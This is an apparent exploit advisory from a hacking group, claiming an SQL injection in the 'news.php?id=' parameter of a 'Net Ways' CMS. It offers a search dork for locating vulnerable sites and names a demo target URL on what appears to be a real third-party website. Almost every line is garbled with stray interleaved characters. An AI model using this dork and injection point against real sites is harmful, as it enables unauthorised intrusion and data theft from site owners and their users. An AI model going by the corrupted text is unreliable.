################################################################################??########
( O! K/ E: t5 W( |#
; d7 o: ?7 u% }" R* ?6 h$ i2 M0 I# Exploit Title : Net Ways Cms Sql Injection Vulnerability
1 W: s6 R. l Y* Y+ g9 n#
6 n0 W* s/ I2 ?- c# Author : IrIsT.Ir # \! k. z5 {2 x& A8 r
# ' T( f j7 S# e2 B. l
# Discovered By : Am!r
/ k; d, B+ M. r# W H6 p# # y* z6 U, U# A# D. Z
# Home : http://IrIsT.Ir/forum
' V$ w0 y2 E4 h/ d) {#
4 F0 f, Q" u7 j9 c8 B( C# Software Link : http://www.netways.com/ www.political-security.com& V6 I U7 K! B4 b, M- S h5 G
# ' u" i5 g4 r5 o8 q3 J- S$ K& c7 }
# Security Risk : High
( g; t2 B5 {5 @6 o' N. N# 2 z: a. s; P. N; @- H% k T
# Version : All Version
' y3 Z; r" c! o: Y#
5 X! R9 u5 Q; G1 ^+ Q2 ~( m8 Z# Tested on : GNU/Linux Ubuntu - Windows Server - win7 . U1 J! b7 Z& w3 d9 R5 L2 Q
# 3 Y' g1 `6 n% G* K
# Dork : intext:"Designed & developed by NetWays" 2 r% B; W) _% ?. V2 c& _. T; ~
# p! j+ T" y# ~( a$ f) |$ S' ]
################################################################################??########
& I7 }$ ^5 {' D- b#
! @4 T. r; r% Q+ {/ o6 Z6 o% ^" P# Expl0iTs :
/ E% D5 p# r& {# 3 `, Z2 H9 a2 C" a: O: P
# http://target.com/news.php?id=[Sql] ; L8 C( `' W9 `! U- R/ n# w7 H9 b
# 4 O# S7 y2 a1 q+ `3 Z
# 7 r. S* Q( ?* J
# D3mo :
( Q+ _, W: h$ G3 Y* V& b#
% W" a' D B/ U; h& Z' J" r! d# http://compagnieparento.com/news.php?id=7[Sql] ; q* o9 u0 B' s
#
7 e1 l8 T5 T) ?1 k p1 A$ x/ X################################################################################??########
2 ?, i# v7 j8 e8 s$ t v2 f# ; P6 _: h! m: Y# g9 l! \8 O1 R
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r 7 ]2 W! D; O5 f: l
#
_: A2 ~$ M: z8 a+ }* g) r, s! f: x$ z# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
; p2 d& B' y4 G- h2 g( V D$ w# : j4 I+ V6 | s3 E1 j3 H0 a/ x
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum h- Q4 a/ f" N- z/ [# t
# c3 h5 n6 N, o
################################################################################??######## |